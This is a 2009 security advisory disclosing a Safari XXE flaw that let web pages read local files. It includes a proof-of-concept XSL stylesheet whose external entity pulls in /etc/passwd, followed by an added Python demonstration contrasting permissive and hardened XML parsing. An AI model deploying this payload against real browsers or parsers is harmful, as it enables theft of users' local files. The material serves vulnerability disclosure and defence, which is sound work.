CESA-2009-006 - rev 1
[See all my vulnerabilities at http://scary.beasts.org/security]
[Blog if you want to subscribe to new findings is at http://scarybeastsecurity.blogspot.com/]
Apple Safari local file theft bug
Programs affected: Safari prior to version 4
Severity: Websites can steal files from the victim's computer
Vendor URL (copy): APPLE-SA-2009-06-08-1
Initial report: Jun 2008
Safari was vulnerable to an XXE attack against a relatively obscure area of
XML parsing. As a recap, XXE (Xml eXternal Entity) attacks abuse a built-in
feature of XML to fetch files (or network resources) and embed them in an
attacker's document. XXE attacks are most common server-side; this advisory
notes a client-side attack against the Safari browser.
Safari's XSL stylesheets were vulnerable to XXE attacks. By having a random
XML file refer to an evil XSL resource (which is itself an XML-based format),
the attacker can steal a local file by referring to it in the XSL resource's
DTD.
Here's the code for the evil XSL resource, DTD included:
<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
                xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <html>
      <body>
        Below you should see the content of a local file, stolen by this evil web page.
        <p/>
        &ent;
        <script>
          alert(document.body.innerHTML);
        </script>
      </body>
    </html>
  </xsl:template>
</xsl:stylesheet>
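To see the same external-entity expansion outside a browser, and the parser setting that prevents it, here is an added example (not from the advisory) that feeds the stylesheet above to Python's standard-library SAX parser twice: once with external general entities followed, as unpatched Safari did, and once with them disabled. The target file is a constructed stand-in for /etc/passwd written to a temporary directory.

```python
# Added illustration, not the advisory's code: the same XXE pattern fed to Python's
# SAX parser, with the parser setting that stops it. The secret file is constructed.
import io, os, tempfile, xml.sax
from xml.sax import handler

# Constructed stand-in for /etc/passwd so the demo never reads real system files.
SECRET_TEXT = "root:x:0:0:root:/root:/bin/bash\n"
# The advisory's stylesheet with the SYSTEM identifier pointed at the stand-in file.
STYLESHEET = """<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file://{path}"> ] >
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html><body>
Below you should see the content of a local file, stolen by this evil web page.
<p/>
&ent;
</body></html>
</xsl:template>
</xsl:stylesheet>
"""

class TextCollector(handler.ContentHandler):
    """Collects every text node the parser delivers, expanded entities included."""
    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

def parse_stylesheet(xml_bytes, follow_external_entities):
    """Return the document's character data. True mirrors unpatched Safari: the
    parser fetches the file named by the SYSTEM id and inlines it. False (the
    hardened setting, and Python's default since 3.7.1) leaves &ent; unexpanded."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, follow_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)

def run_demo():
    """Parse the stylesheet both ways and return what text each parse exposed."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w") as f:
            f.write(SECRET_TEXT)
        xml_bytes = STYLESHEET.format(path=secret_path).encode()
        return {"permissive": parse_stylesheet(xml_bytes, True),
                "hardened": parse_stylesheet(xml_bytes, False)}
```

The permissive parse yields the secret file's line among the document text; the hardened parse yields only the stylesheet's own text, which is the property a browser must hold for any XML it fetches from the web.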
Demos
Click here for Safari 3 / MacOS
Click here for Safari 3 / Windows
Credits
- Google - found on Google's time. Be aware that nothing on my personal
pages or blog represents Google... obviously.
Chris Evans
scarybeasts@gmail.com